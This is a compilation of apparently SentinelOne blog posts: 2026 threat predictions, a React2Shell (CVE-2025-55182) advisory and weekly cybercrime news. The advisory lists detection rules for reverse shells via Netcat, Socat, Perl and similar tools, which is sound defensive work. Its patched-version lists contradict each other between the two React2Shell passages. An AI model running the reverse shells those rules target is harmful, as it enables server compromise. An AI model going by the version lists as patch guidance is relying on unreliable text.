That exposure offers raw material for counter‑narratives and operations by Caracas’ backers. Russia is already running well‑funded Spanish‑language disinformation and propaganda campaigns across Latin America, often in coordination with partner state media, with a long‑standing focus on undermining U.S. standing in the region. Iran has used Venezuela as a beachhead for sanctions evasion, proxy networks, and anti‑U.S. activity, including leveraging IRGC and Hezbollah-linked structures to expand its reach in the hemisphere. China, meanwhile, is quietly consolidating intelligence collection capabilities via regional ground stations, telecom infrastructure, and proximity to key undersea cables, assets Western analysts already flag as potential platforms for surveillance of U.S. communications.

In 2026, we should expect to see cyber and information operations explicitly framed as “defending Venezuela from U.S. aggression”, but operationally aimed at the United States and its closest partners.

• Russian and Venezuela‑aligned influence networks will likely amplify any evidence of U.S. IO/espionage, real, exaggerated, or fabricated, into Spanish and English‑language campaigns targeting U.S. domestic audiences, Latin American publics, and the Venezuelan diaspora.
• Iranian‑linked actors can be expected to piggyback on the crisis to probe U.S. critical infrastructure and financial networks under an “Axis of Authoritarianism” narrative, using the Venezuela storyline to justify escalation in cyber operations they were running for other reasons anyway.
• Chinese‑linked capabilities are more likely to manifest as intensified collection and mapping, SIGINT on U.S. deployments, diplomatic traffic, and commercial flows, rather than loud influence campaigns, but that data will feed the same broader alignment.

For CTI teams, the prediction isn’t some “ big Venezuela cyber war,” it’s a convergence problem. A Venezuelan crisis becomes the pretext that ties together Russian, Iranian, Chinese, and local pro‑regime operators into loosely synchronized campaigns: hack‑and‑leak operations targeting U.S. policy debates; cross‑platform disinformation linking Venezuela to border, drugs, and migration narratives; the probing of U.S. energy, maritime, and telecom infrastructure under the cover of regional tension.

Expect to see Spanish‑language infrastructure and personas show up in incidents that ultimately impact U.S. and European networks and more clusters where attribution threads run through Caracas and Moscow/Tehran/Beijing at the same time. The organizations most likely to feel this first are those at the seam lines: energy, logistics, telecom, diaspora media, and NGOs with one foot in the U.S. and one in the region.
Tom Hegel, Distinguished Threat Researcher, SentinelLABS

 

China’s Fifteenth Five Year Plan

A new Five-Year Plan from the Chinese Communist Party means a new hit-list for China’s hackers.

After Xi came into power in 2013, he set about issuing development goals for science and technology in China not seen since the leadership of Mao Zedong. The most notable, Made in China 2025 was released two years later in 2015. After American opprobrium reached its peak in the first Trump administration, China slowly withdrew MIC2025 from the limelight. American attention to the strategy led to significant collection difficulties for the PRC as the US FBI and other government agencies prioritized defense of targeted technologies in the private sector and at US research institutions, like universities.

In 2021, the PRC released publicly only a vague outline of the Party’s Medium- to Long-Term Development Plan for Scientific and Technological Innovation, which set innovation goals for 2025, 2030, and 2035. Foreign attention to MIC2025 led the Party to mark the full content of the plan as “internal circulation only.”

The 15th Five-Year Plan promises to push some of those privately-held development goals into the spotlight. The PRC central government will release the official 15th FYP in 2025, and will delegate much of the details about achieving its objectives to government ministries. Ministries will release their more-detailed version of the 15th FYP in late 2025 or early 2026. Those documents create a political demand signal for provincial governments and bureaucracies to work towards realizing.

Contracted hackers looking to pilfer western technology and sell it to the highest bidder in China will consult those documents to identify the technologies their customers are likely to pay good money for. If your industry is on the list of targeted technologies, buckle up.
Dakota Cary, Senior Security Advisory Consultant

 

Organized Cybercrime | More Integrated, Streamlined & Aggressive

Commodities and Cartels

Ransomware and infostealers are now commodity features. We’ve blown past this milestone in the last couple of years. Consider ransomware and data exfiltration as givens in the event of any opportunistic breach. While the days of the ‘big brand’ extortion operations are waning, we are seeing more smaller, organized groups offering à la carte services, including ransomware, but ultimately, this is just another feature available in ‘run of the mill malware’.

The blending of infostealer and ransomware-style features into more swiss-army knife tools and services will attract a broader set of criminals, a natural evolution already underway, given the heavy reliance of modern attacks on the infostealer logs ecosystem.

This also overlaps with the trend towards more ‘Cartel-style’ operations or ‘alliances’ which consolidate disparate malicious services into more all-encompassing “MaaS” offerings.

Ransomware & Initial Access Brokers

As these cartels and service ecosystems solidify, the relationships that underpin initial access are tightening as well. Ransomware groups continue to work closely with IABs (Initial Access Brokers), with an increasing number of threat actors publicly and aggressively attempting to recruit ‘trusted’ IABs. Groups like Sicarii advertise special advantages to others willing to partner with them.

Additionally, we can expect to see IABs starting to offer more targeted bundles consisting of curated credential sets. For example, IABs will start offering ‘chains’ based on cumulative sets of related credentials (chain of VPN->O365->Cloud Console access for a target). There are some specializing in this now, but we expect this to become more mainstream as the infostealer log ecosystem, which feeds many IABs, continues to explode.

Increasing Attacks Will Offer Defenders Fewer IOCs and Artifacts

There are some interesting micro trends within these smaller, more obscure, operations. One such trend is the omission of ransom notes and other noisy filesystem artifacts, and threat actors moving towards more direct follow-ups via emails and phone calls to initiate communications.

We have seen groups like “Penguin Cartel’ operate in this way, and we expect adversaries to increasingly embrace these alternate methods of first notification in extortive attacks.

Businesses Will Keep Losing Data, Encryption Not Required

This operational “quieting” aligns with another growing trend: attackers no longer need to encrypt data to profit from it. This is far from new, but it is increasing. More crimeware actors eschew encryption entirely, opting to extort victims to prevent release of the exfiltrated data. Groups like Kairos and WorldLeaks are current examples of this model.

More Automation, More Upscaling

While the “AI-revolution” has yet to fully transform the downstream atomic artifacts of crimeware, cybercriminals are taking advantage of various automation options, using AI to augment and scale-up their output.

An increasing number of actors are leveraging AI agents, Telegram Bots and similar features both to automate discovery and sales of their product and C2 activities. This has long since been a practice in the traditional infostealer community, but we are seeing an uptick of this across the crimeware landscape.

Pressure Escalates Tactics

Threat actors are continuing to apply real-world violence (VaaS) to ensure their profitability. Naming-and-shaming via data leak sites will remain a permanent feature of the landscape, but we will see further pressure being applied to business clients, customers, family members and entities that are peripheral to the victim. One common manifestation of this is swatting groups being called upon to apply pressure to financial crime victims.

Additionally, threat actors will continue to leverage regulatory and compliance laws to apply pressure and time leak announcements around critical events such as earnings calls or M&A negotiations.
Jim Walter, Senior Threat Researcher, SentinelLABS

 

Living Off Apple’s Land | Latent Powers and Stolen Trust

Last year, we noted how threat actors were making hay abusing AppleScript’s spoof-friendly ability to create password dialog boxes to gain elevated privileges, but as many unfortunate victims have been finding out this year, that’s far from all AppleScript is good for.

ClickFix is the new social-engineering kid-on-the-block for every stripe of threat actor from nation state APTs to opportunistic cryptowallet-stealing cybercriminals. Dropping a simple two-line AppleScript that opens an innocuous webpage, perhaps a support portal for some legit technology, with up to 10000 blank lines ending with a few malicious lines of code is a ridiculously simple but effective method of social engineering.

2026 will see the continuation of both techniques. However, as old as Python and as powerful as PowerShell, AppleScript has a lot more juice left in it from a threat actor point of view.

We are just beginning to see the first signs of adversaries making use of AppleScript’s Objective-C (AS-ObjC) bridge — a wonderful technology that brings the power of Apple’s Foundation and AppKit frameworks, including NSWorkspace, to simple AppleScripts. In the past, we’ve seen AS-ObjC’s newer cousin JXA (JavaScript for Automation) gain traction in red-teaming tools like Apfell; it’s a small conceptual leap from there to the (arguably) easier world of AppleScript Objective-C.

That opens up a whole new world of in-memory scripting power that otherwise usually requires a compiled binary and readily-detectable file writes. Will we see threat actors lean into this old, built-in, not-widely known, yet incredibly powerful way of programming Mac computers? If you’re a threat actor, it’s a Living-off-the-Land technology dream come true. If you’re a defender, it’d be smart to start thinking about what that looks like from a telemetry point-of-view in 2026. And while we’re on the topic of powerful, Apple Framework-enhanced scripting languages, Swift scripting is a thing worth keeping in mind, too.

On macOS, ClickFix was a necessity-is-the-mother-of-invention response to Apple’s plugging of the Gatekeeper workaround. However, you don’t need a bypass to Apple’s increasingly strict code signing and notarization rules if your malware is signed with a valid developer ID.

Illicit trade in verified Apple Developer accounts is something we’ve seen increase in the latter half of 2025, and it’s only a matter of time before we see these abused by more malware authors. Temporary they may be, as Apple is quick to nix such accounts once identified, but even a short-lived campaign can do a lot of damage against the right targets.

The lesson for defenders is not to treat validly code signed executables as some kind of exception to detection rules. Signed code tells a defender little more than that it passed Apple’s automated checks and that the code has a name attached to it. In the case of malware, that’s almost certainly not the name of a threat actor.
Phil Stokes, macOS Research Engineer, SentinelLABS

 

The AI Reckoning | Consolidation, Censorship, and Economic Fallout

Specialized Models Will Belong to Those Who Can Make Them

Over the next few years, we’ll watch a huge number of AI companies simply disappear.

The generic “copilot for X” and “AI workspace” products that dominated pitch decks in 2023–2024 will be reborn as bloodless, checkbox features inside Microsoft 365, Google Workspace, and other large platforms. The quality will be worse than the specialized startups they replace, but that won’t matter because they’ll be easy to buy on an enterprise contract, come bundled with existing tools, and be turned on with a toggle in an admin console.

The result will look like a mass extinction. Valuations will implode and the easy money will evaporate. The tech influencer class on X will still push the “996 grindset mentality” even as the few humbled survivors of the crash pivot from “owning the category” to cutting costs and delivering durable value to a smaller, demanding set of customers.

But this is also exactly the environment in which truly specialized organizations start to matter. These smaller entrants will sit in narrow, high-stakes domains: cybersecurity, law, finance, industrial control, biotech…

In those areas, the winners will be teams that have quietly built a repeatable data and training pipeline, have access to proprietary datasets, and can deploy smaller models that are integrated into specific workflows, regulations, and hardware.

Advances in training efficiency, data curation, and model compression will be among the most valuable pieces of this puzzle, and they will increasingly move out of public view. Labs will publish less, national-security programs will classify more, and a handful of specialized shops will jealously guard their pipelines.

The Bubble Pops in a Poisoned Reality

AI is unpopular as an idea. For most consumers it means glitchy chatbots, over-eager automation at work, auto-generated spam, and marketing departments screaming about “AI-powered” everything. The underlying capabilities are real, but the experience is mostly annoyance, precarity, and a strong sense that someone else is getting rich off a thing that is happening to you, not for you.

On top of that resentment, we’ve layered a classic asset bubble. Capital has flooded into anything AI: driving valuations, headcount, and infrastructure spending far beyond what current use-cases justify. In the last year, large tech companies have fired workers while bragging about “AI efficiencies,” even when they’re mostly just undoing years of over-hiring.

The important prediction isn’t “a bubble exists”; it’s how people will react when it finally hits the wall. Within the next year we should expect a dot-com–scale drawdown in AI equity and private valuations: a broad repricing of pure-play “AI companies,” at least one of today’s marquee AI darlings valued at less than a third of its peak, and a long tail of late-stage startups ruthlessly zeroed-out. The hyperscalers will survive because AI is one line item inside a much larger machine; most everyone else will discover that they built a feature, not a business.

The crash will happen in a reality already saturated with synthetic content. In the scramble to justify their spend, organizations are using models to flood every channel with low-cost output: SEO sludge, autogenerated news, endless pitches, synthetic “user reviews,” fake engagement. Previously trusted sites and platforms are already quietly tilting from human-written to machine-written material because the unit economics are irresistible. The problem is they are using last decade’s metrics: what is the actual economic value of Daily Active Users when the content they are consuming is slop that nobody can monopolize?

As the synthetic layer of our online experience deepens, models are trained and retrained on their own exhaust and on rival models’ curated “knowledge bases”, wiki-like sites and reference corpora that are themselves partially or wholly machine-written. Systems start to treat these partisan or synthetic compilations as “ground truth” simply because they look like structured authority.

The targeted threat of “model poisoning” becomes the inescapable threat of “reality poisoning” and the line between what actually happened and what the machine inferred as plausible will vanish.

This increasingly synthetic environment directly undermines the business case that justified the bubble in the first place. Search gets worse, watered down, and commoditized. Feeds become vacuum sealed bubbles where nothing breaks containment. Analytics get noisier and less reliable. Conversion rates slip as users learn to distrust what they see on screens. Enterprises that bought AI to “supercharge knowledge work” find that their internal knowledge bases are now clogged with plausible nonsense that’s harder and harder to audit. The marginal ROI on yet another AI integration rapidly decays.

So when the capital tide goes out, the public story will be simple and hostile. “AI took my job and ruined the internet.” The actual big picture may be composed of macro economics, overcapacity, and misallocated capital, but the emotional truth will be that AI made jobs less secure, the information environment less trustworthy, and the daily experience of technology spammy and brittle.

In the aftermath, the models will remain, the infrastructure will remain, and the incumbents will survive by using them where they produce actual value. What won’t survive will be broad-based cultural, political, and financial enthusiasm.

In the next year, we will end up with powerful systems embedded deep in a few dominant platforms, operating in a permanently contaminated data environment, surrounded by a public that no longer believes the marketing and cannot trust the outputs.

Dual-Use Will Eat Alignment and Turn Into Regional Censorship

AI and LLM development are on track to become core pillars of national defense. Questions about “U.S. vs. China vs. everyone else” will move out of policy think-tanks and into mainstream geopolitics. Behind closed doors, frontier systems will be evaluated less as “products” and more as strategic infrastructure: tools that can rewrite the balance of cyber offense, intelligence gathering, and information operations both at home and abroad.

In this world, statements of “public model alignment” will become less important. The loud, visible debates about fairness, bias, and “responsible AI” will continue, but the most consequential work on offensive AI capabilities will move into secure facilities, export-controlled supply chains, and gray markets. The question will shift from “Is this system aligned with human values?” to “Is this system aligned with our national interests?”

Because AI systems are inherently dual-use, offensive capabilities and control affordances will be developed in parallel. The same model that politely refuses to discuss certain topics in a consumer chat interface will have close cousins tuned for intrusion discovery, vulnerability triage, targeted influence, and automated exploitation. Many of those capabilities will originate in state-backed programs, but they won’t stay there. They’ll diffuse into law enforcement, domestic security services, and private contractors, where they will be applied to civilian populations as instruments of soft control and, when desired, hard power.

That logic will leak out into the consumer layer as regionalized safety controls. As these technologies scale, they will increasingly mirror existing patterns of information control. Providers will ship different rule-sets and behaviors by jurisdiction, the way streaming platforms already fragment their catalogs country by country. Providers will claim that this represents “localization” efforts — where differences in language and cultural references are updated for the target population. What they are really localizing is the range of thinkable thoughts within a language model.

Whatever their marketing stance on “neutrality” or aversion to particular ideological labels, major providers will have very strong incentives to align their models with local statutes, regulatory guidance, and informal political red lines. If a given government can threaten licenses, data-center permits, key executives, or revenue streams, the “alignment layer” becomes one more lever for the powerful. Governments will jump at the opportunity to tweak refusal patterns, soften the model’s treatment of this history, or remove guidance that might make protests more effective.

Over time, legislators, regulators, authoritarian regimes, and litigators will get a much sharper sense of where these levers sit inside these systems: how content filters work, what knobs exist for toxicity, radicalization, and persuasion, or how model-delivered advice translates into real-world actions. The volume and specificity of legal and policy demands on these knobs will expand accordingly.

Engineering teams at these companies will spend less time debating abstract philosophical framings and more time implementing tightly scoped, jurisdiction-specific constraints designed by lawyers and national security officials.

The result will be a stratified ecosystem:

• Public, region-locked models that are heavily constrained will become the systems most people will interact with day to day.
• Institutional and security-grade models, derived from the same or larger bases but deployed inside governments, defense contractors, and domestic security agencies, will be used to profile, predict and shape human behavior at scale.
• Informal and illicit models will be leaked, stolen, or quietly licensed and recirculate similar capabilities into criminal markets and non-state actors.

In all three layers, “alignment” will be eaten by dual-use. The systems will be “aligned” to institutional goals, not to a shared, global notion of human flourishing. The public will experience this as an explosion of region-specific censorship and weirdly divergent realities between models that reflect different value systems.

In short, the coming wave of LLM censorship by major U.S. and allied companies is the civilian-facing expression of a deeper shift. Once AI is framed first as a strategic asset and only secondarily as a consumer product, dual-use incentives dominate. Alignment becomes a branch of national security and regulatory compliance, and the map of model behavior starts to trace the borders of political power rather than the contours of an egalitarian reality.
Gabriel Bernadett-Shapiro, Distinguished AI Research Scientist, SentinelLABS

 

Zero or No Trust | Interconnected Services Lead to Increasingly Devastating Intrusions

Zero Trust Architecture networks have been increasingly ubiquitous over the last five years, with the pandemic driving many organizations to rapidly adopt and implement related technologies to support the sudden uptick in remote work. Threat actors were slower to adapt through 2020-2022, as there were plenty of targets who had not jumped on the ZTA bandwagon. Early adopters targeting these environments made headlines by compromising often tech-forward organizations, a far cry from the companies typically in the news for huge ransomware attacks against legacy networks.

In 2025, there were several campaigns where actors targeted highly interconnected environments by focusing on identity providers. The ShinyHunters campaign abusing OAuth relationships in certain Salesforce user environments is a notable example: granting OAuth access to the Data Loader app enabled the attackers to access the victim environment and exfiltrate data using a Salesforce tool intended to do exactly that. Similarly, in August 2025 attackers abused the Salesloft Drift application to hijack OAuth rights to harvest cloud service and SaaS credentials from the targeted environment.

There is huge potential for actors who identify improperly configured or abandoned OAuth-enabled applications. This was demonstrated in 2024 when Midnight Blizzard struck gold by discovering a legacy application in Microsoft’s test environment that enabled high-privileged access to corporate environments. For several years, skilled cloud attackers have been working on tools that map both resources and OAuth relationships in target environments.

While gaining access to such a high value environment as a major cloud service and operating system provider may not be feasible for most actors, increases in automated scanning and data evaluation will only make finding new, well-connected targets easier.

Based on the increased prevalence of Zero Trust environments, an increased attacker focus and understanding of SaaS identity providers, and the rise in sophistication of tools used to identify relationships between identities and assets in organizations’ environments, we believe there is a significant risk for attacks that misuse the new forms of “trust” used to authenticate applications within environments.

A potential evolution we may see in 2026 is tooling that not only targets one SaaS application and its downstream connections, but likely has some degree of automation or evaluation through agentic AI analysis to continue performing more phases of intrusion based on findings from the previous phase.
Alex Delamotte, Senior Threat Researcher, SentinelLABS

 

AI-Driven Threats | Blurred Attribution and the DPRK Wildcard

The use of AI by adversaries will likely manifest in two ways outside of the ongoing discourse. The vast majority of attackers’ use of AI to date has been around driving greater efficiency and automating existing parts of their intrusion lifecycle. The intelligence assessments to date tend to skew towards technical improvements and capabilities.

If we look back on past assessments of emerging technologies — and let’s be honest, AI is without a doubt an emerging technology — two unexpected things tend to happen.

First, threat actors’ use of new technologies almost inevitably blurs existing assessment lines, typically around tradecraft and attribution. If we apply this to AI, the most likely upcoming shift will be lower-level/smaller groups gaining access to capabilities that were previously used to define government-affiliated programs. In particular, AI’s ability to provide language capabilities will bring low-level cybercriminals into the realm of government programs with full linguistic capabilities. This was an incredibly important capability distinction that is likely to end in the coming year solely because of AI.

The second likely outcome will be an almost inevitable surprise from DPRK’s AI use. DPRK cyber activities have previously caught intelligence organizations off-guard multiple times. Examples range from destructive attacks geared towards stopping a movie release through the current IT workers situation.

Additionally, AI has proven highly useful and effective to DPRK efforts, again the IT workers are a great example. When we pair these realities with the vast amount of illicit revenue generated by DPRK’s efforts at stealing cryptocurrency, we see an interesting situation emerging.

We have a cyber effort known to produce surprises, actively leveraging AI in a large and also previously unforeseen manner, and producing large amounts of revenue for the regime through cyber actions, both cryptocurrency theft and IT workers payments.

There is a high likelihood some level of these illicit gains will be reinvested into the DPRK cyber programs to increase their scope, scale, and impact–programs that are already actively pushing the bounds of AI use. While we do not have an expected outcome specifically, the likelihood of an unexpected, large, AI-driven surprise from DPRK is something we should be mindful of and prepared to tackle on the defensive side.

Steve Stone, SVP, Threat Discovery & Response

 

Looking Ahead & Protection Now

Moving ahead demands strong, decisive leadership based on confident security choices and the courage to evolve. For all those committed to a safer and more resilient future, SentinelOne is ready to help secure every aspect of your business. Contact us to learn more about cybersecurity built for what’s next.

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code attacks via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process. The flaw is being tracked as CVE-2025-55182. Originally tagged as a CVE for Next.js, NIST subsequently rejected  CVE-2025-66478, as it is a duplicate of CVE-2025-55182.

This blog post includes the critical, immediate actions recommended to secure your environment, new and existing Platform Detection Rules designed to defend against this vulnerability, and information on how SentinelOne Offensive Security Engine, a core component of  the Singularity Cloud Security solution, allows our customers to quickly identify potentially vulnerable workloads.

What is React2Shell? Background & Impact

On December 3, 2025, the React and Next.js teams disclosed two related vulnerabilities in the React Server Components (RSC) Flight protocol: CVE-2025-55182 (React) and CVE-2025-66478 (Next.js), with the latter CVE now marked by NIST as a duplicate.

• React announcement
• Next.js announcement

Both enable unauthenticated RCE, impacting applications that use RSC directly or through popular frameworks such as Next.js. These vulnerabilities are rated critical (CVSS 10.0) because exploitation requires only a crafted HTTP request. No authentication, user action, or developer-added server code is needed for an attacker to gain control of the underlying Node.js process.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Since many modern frameworks enable RSC as part of their default build, some teams may be exposed without being aware that server-side RSC logic is active in their environment.

Security testing currently shows:

• Exploitation can succeed with near 100% reliability
• Default configurations are exploitable, including a standard Next.js app created with create-next-app and deployed with no code changes
• Applications may expose RSC endpoints even without custom server functions
• A single malicious request can escalate to full Node.js process compromise

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

Available Vendor Mitigations & Immediate Actions

Fixes are available in React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 5.x, Next.js 16.x, Next.js 14.3.0-canary.77 and later canary releases. Administrators are urged to audit environments and update affected packages immediately.

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications.

1. Update React by installing the patched versions of React as listed above.
2. Update Next.js and other RSC-enabled frameworks as listed above. Ensure the latest framework and bundler releases are installed so they ship the patched React server bundles.
3. Review deployment behavior by checking whether your organization’s workloads expose RSC server function endpoints. These may exist regardless of whether developers added custom server functions.

How SentinelOne Protects Our Customers

Cloud Native Security – Offensive Security Engine

SentinelOne’s Offensive Security Engine (OSE), core component of its Singularity Cloud Security solution, proactively distinguishes between theoretical risks and actual threats by simulating an attacker’s methodology. Rather than relying solely on static scans that flag every potential misconfiguration or vulnerability, this engine automatically conducts safe, harmless simulations against your cloud infrastructure to validate exploitability.

This approach delivers differentiated outcomes by radically reducing alert fatigue and focusing security teams on immediate, confirmed dangers. By providing concrete evidence of exploitability—such as screenshots or code snippets of the successful simulation—it eliminates the need for manual validation and “red teaming” of every alert. Shift from chasing hypothetical vulnerabilities to remediating verified attack vectors, ensuring resources are always deployed against the risks that pose a genuine threat to their environment.

In response to this vulnerability, SentinelOne released a new OSE plugin which can verify exploitability of these vulnerabilities for publicly accessible workloads using a defanged (i.e., harmless) HTTP payload.

Viewing Misconfigurations in the SentinelOne Console

SentinelOne customers can quickly identify potentially vulnerable workloads using the Misconfigurations page in the SentinelOne Console.

This highlights Node.js workloads that are exposing RSC-related server function endpoints. Once identified, affected assets can be patched or temporarily isolated. SentinelOne CWS also detects suspicious Node.js behaviors associated with exploitation attempts, including downloaders and reverse shells, and provides Live Security Updates to maintain protection as new detections are deployed.

It identifies verified exploitable paths on your publicly exposed assets, confirming which systems are truly at risk. By validating exploitability rather than simply flagging theoretical vulnerabilities, Singularity Cloud Security minimizes noise and provides concrete evidence so security teams can focus on what matters.

Wayfinder Threat Hunting

The Wayfinder Threat Hunting team is proactively hunting for this emerging threat by leveraging comprehensive threat intelligence. This includes, but is not limited to, indicators and tradecraft associated with known active groups such as Earth Lamia and Jackpot Panda.

Our current operational coverage includes:

• Atomic IOC Hunting: We have updated our atomic IOC library to include known infrastructure and indicators from these threat actors, as well as broader intelligence regarding this campaign.
• Behavioral Hunting: We are actively building and executing hunts designed to detect behavioral TTP matches that identify suspicious activity beyond static indicators.

Notification & Response All identified true positive findings will generate alerts within the console for the affected sites. For clients with MDR, the MDR team will actively review these alerts and manage further escalation as required.

Platform Detection Rules

SentinelOne’s products provide a variety of detections for potential malicious follow-on reverse shell behaviors and other actions which may follow this exploit. As of December 5, 2025, SentinelOne released new Platform Detection Rules specifically to detect observed in-the-wild exploit activity. We recommend customers apply the latest detection rule, Potential Exploitation via Insecure Deserialization of React Server Components (RSC), urgently to ensure maximum protection.

Additionally, SentinelOne recommends customers verify the following existing rules have also been enabled:

• Potential Reverse Shell via Shell Processes
• Potential Reverse Shell via Node
• Potential Reverse Shell via Python
• Reverse Shell via Perl Utility
• Potential Reverse Shell via AWK Utility
• Potential Reverse Shell via GDB Utility
• Potential Reverse Shell via Lua Utility
• Potential Reverse Shell via Netcat
• Potential Reverse Shell using Ruby Utility
• Potential Reverse Shell via Socat Utility

Conclusion

CVE-2025-55182 and CVE-2025-66478 represent critical risks within the React Server Components Flight protocol. Because frameworks like Next.js enable RSC by default, many environments may be exposed even without intentional server-side configuration. Updating React, updating dependent frameworks, and verifying whether RSC endpoints exist in your organization’s workloads are essential steps.

Singularity Cloud Security helps organizations reduce risk by identifying vulnerable workloads, flagging misconfigurations, and detecting malicious Node.js behavior linked to RCE exploitation. This provides immediate visibility and defense while patches are applied.

Learn more about SentinelOne’s Cloud Security portfolio here or book a demo with our expert team today.

Third-Party Trademark Disclaimer:

All third-party product names, logos, and brands mentioned in this publication are the property of their respective owners and are for identification purposes only. Use of these names, logos, and brands does not imply affiliation, endorsement, sponsorship, or association with the third-party.

The Good | Authorities Jail WiFi Hacker, Seize €1.3B Crypto Mixer & Charge Two Malicious Insiders

An Australian national has received just over seven years in prison for running “evil twin” WiFi networks on various flights and airports to steal travelers’ data. Using a ‘WiFi Pineapple’ device as an access point, he cloned legitimate airport SSIDs. Users were then redirected to phishing sites where he harvested their credentials, which were exploited to access women’s accounts and obtain intimate content. Investigators found thousands of images, stolen credentials, and fraudulent WiFi pages. The individual has since pleaded guilty to multiple cybercrime, theft, and evidence-destruction charges.

In Europe, Swiss and German authorities have dismantled the Cryptomixer service, which allegedly laundered over €1.3 billion in Bitcoin since 2016. As part of Operation Olympia, officials seized three servers, 12 TB of data, Tor .onion domains, and €24 million in Bitcoin, with support from Europol and Eurojust. Cryptomixer, accessible on both the clear and dark web as a hybrid mixing service, obscured blockchain transactions for ransomware operators, dark markets, and a variety of criminal groups.

U.S. prosecutors have charged Virginia twin brothers for allegedly conspiring to steal sensitive government data and destroy databases after being fired as federal contractors. Previously sentenced in 2015 for unauthorized access to State Department systems, they returned to contracting roles before facing these latest indictments for fraud, identity theft, and record destruction. The Justice Department says one brother deleted 96 government databases in February 2025, stole IRS and EEOC data, and abused AI for guidance on how to hide evidence. Both men now face lengthy federal penalties if convicted.

The Bad | Investigation Exposes Contagious Interview Remote Worker & Identity Theft Scheme

In a collaborative investigation, researchers have exposed a persistent North Korean infiltration scheme linked to Operation Contagious Interview (aka UNC5267). The researchers observed in real time adversary operators using sandboxed laptops, revealing tactics designed to embed North Korean IT workers in Western companies, especially those within STEM and finance industries.

Livestreaming from a #Lazarus laptop farm.

For the first time ever, we recorded DPRK’s Famous Chollima full attack cycle: interviews, internal chats, every tool they use and every single click they made. Get ready for tons of raw footage.

Full article via ANYRUN. pic.twitter.com/2fyTn3zLI6

— Mauro Eldritch (@MauroEldritch) December 4, 2025

The operation began when a researcher posed as a U.S. developer targeted by a Contagious Interview recruiter. The attacker attempted to hire the fake developer, requesting full access to their SSN, ID, Gmail, LinkedIn, and 24/7 laptop availability. Virtual machines mimicking real developer laptops where deployed, allowing the researchers to monitor every action without alerting the operators.

The sandbox sessions showed a lightweight but effective toolkit focused on identity theft and remote access rather than malware deployment. Operators were also seen using AI-driven job tools to auto-fill applications and generate interview answers, browser-based OTP generators to bypass MFA, and Google Remote Desktop for persistent control. Reconnaissance commands validated the environment, while connections routed through Astrill VPN matched known Contagious Interview infrastructure. In one session, an operator explicitly requested ID, SSN, and banking details, confirming the goal of full identity and workstation takeover.

The investigation highlights remote hiring as a quiet yet reliable entry point for identity-based attacks. Once inside, attackers can access sensitive dashboards, critical business data, and manager-level accounts. Companies can reduce risk by raising internal awareness and providing safe channels for employees to report suspicious requests, helping prevent infiltration before it escalates into internal compromise.

The Ugly | Researchers Warn of Critical React2Shell RCE Vulnerability in React and Next.js

A critical remote code execution (RCE) vulnerability, dubbed ‘React2Shell’, affecting React Server Components (RSC) and Next.js, is allowing unauthenticated attackers to perform server-side code via malicious HTTP requests.

Discovered by Lachlan Davidson, the flaw stems from insecure deserialization in the RSC ‘Flight’ protocol and impacts packages including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Versions affected include React 19.0 to 19.2.0 and Next.js experimental canary releases 14.3.0 to 16.x below patched versions. Exploitation is highly reliable, even in default deployments, and a single request can compromise the full Node.js process.

The flaw is being tracked as CVE-2025-55182. The technically correct CVE-2025-66478 has now been marked as a duplicate.

The vulnerability exists because RSC payloads are deserialized without proper validation, exposing server functions to attacker-controlled inputs. Modern frameworks often enable RSC by default, leaving developers unknowingly exposed. Fixes are available in React React 19.0, 19.1.0, 19.1.1, and 19.2.0, and Next.js 15.0.5–16.0.7. Administrators are urged to audit environments and update affected packages immediately.

Security researchers warn that cloud environments and server-side applications using default React or Next.js builds are particularly at risk. Exploitation could allow attackers to gain full control over servers, access sensitive data, and compromise application functionality. Reports have already emerged of China-nexus threat groups “racing to weaponize” the flaw.

China-nexus cyber threat groups rapidly exploit React2Shell vulnerability (CVE-2025-55182)
December 4, 2025, Amazon Web Services
aws.amazon.com/blogs/securi…
@awscloud.bsky.social

[image or embed]

— 780th Military Intelligence Brigade (Cyber) (@780thmibdecyber.bsky.social) 5 December 2025 at 11:32

Companies are advised to review deployments, restrict unnecessary server-side exposure, and monitor logs for anomalous RSC requests. Securing default configurations, validating deserialized input, and maintaining a regular patch management schedule can prevent attackers from exploiting framework-level vulnerabilities in production applications. SentinelOne’s blog post on the React2Shell RCE flaw can be found here.

The Good | Poland Detains Russian Hacker Amid Rising Moscow-Linked Sabotage

Poland’s Central Bureau for Combating Cybercrime (CBZC) has arrested a Russian national in Kraków on suspicion of breaching the IT systems of local companies, marking the latest incident tied to what Warsaw describes as Russia’s expanding sabotage and espionage campaign across Europe. According to Polish Interior Minister Marcin Kierwiński, the suspect allegedly compromised corporate-level security defenses to access and manipulate company databases in ways that could have disrupted operations and endangered customers.

Investigators say the man illegally entered Poland in 2022 and later obtained refugee status. He was detained on November 16 by Polish authorities and has since been interrogated, charged, and placed in three months of pre-trial custody. Authorities also believe he may be connected to additional cyberattacks affecting firms in Poland and other EU states, and they are still determining the full scope of the damage.

The arrest comes amid heightened concern over Russian hybrid warfare since Moscow’s invasion of Ukraine in 2022. Poland has linked recent incidents, including sabotage of a railway line and a fire at a major shopping mall, to Russian intelligence activities. The country has shut down all Russian consulates following the events.

EU officials warn that cyberattacks against regional companies and institutions have surged, with many attributed to GRU-backed actors. Other recent disruptions have included payment service outages and leaks of customer data from Polish firms. In response, Polish Digital Affairs Minister Krzysztof Gawkowski plans to invest a record €930 million on bolstering the county’s cybersecurity, underscoring what authorities describe as the urgent need for stronger corporate defenses and deeper international cooperation against increasingly aggressive cyber threats.

The Bad | FBI Warns of Banking Fraud & Account Takeover Schemes Ahead of Holidays

